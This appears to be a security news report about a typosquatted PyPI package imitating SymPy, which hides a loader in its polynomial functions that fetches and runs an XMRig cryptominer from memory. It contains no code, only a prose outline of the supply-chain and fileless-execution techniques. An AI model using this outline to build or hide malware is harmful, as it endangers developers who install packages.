Malicious PyPI Package Impersonates Sympy Mimic Popular

Security researchers have discovered a malicious PyPI package that employs typosquatting and lookalike metadata, effectively tricking users into installing a fraudulent version of a legitimate library.

The researchers also noted that the package quickly crossed more than a thousand downloads within its first day online, proving how fast such threats can spread once they enter a public registry.

Execution Chain: From Polynomial Math to Cryptomining

The most concerning part of this campaign lies in how the malware activates and runs.

Instead of triggering on import, the attacker injected a loader into specific polynomial routines inside the modified SymPy code.

When those math functions are called, the loader quietly contacts remote servers controlled by the attacker, fetches a configuration file, and then downloads a separate Linux binary.

Socket.dev researchers identified that this binary is an XMRig-based cryptominer configured to mine cryptocurrency over encrypted Stratum connections.

To reduce traces on disk, the loader uses Linux’s memfd_create system call and executes the payload directly from memory using the /proc/self/fd path.

This in-memory execution pattern helps the malware evade simple file-based scans, while still turning legitimate algebra operations into a covert mining operation in the background.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.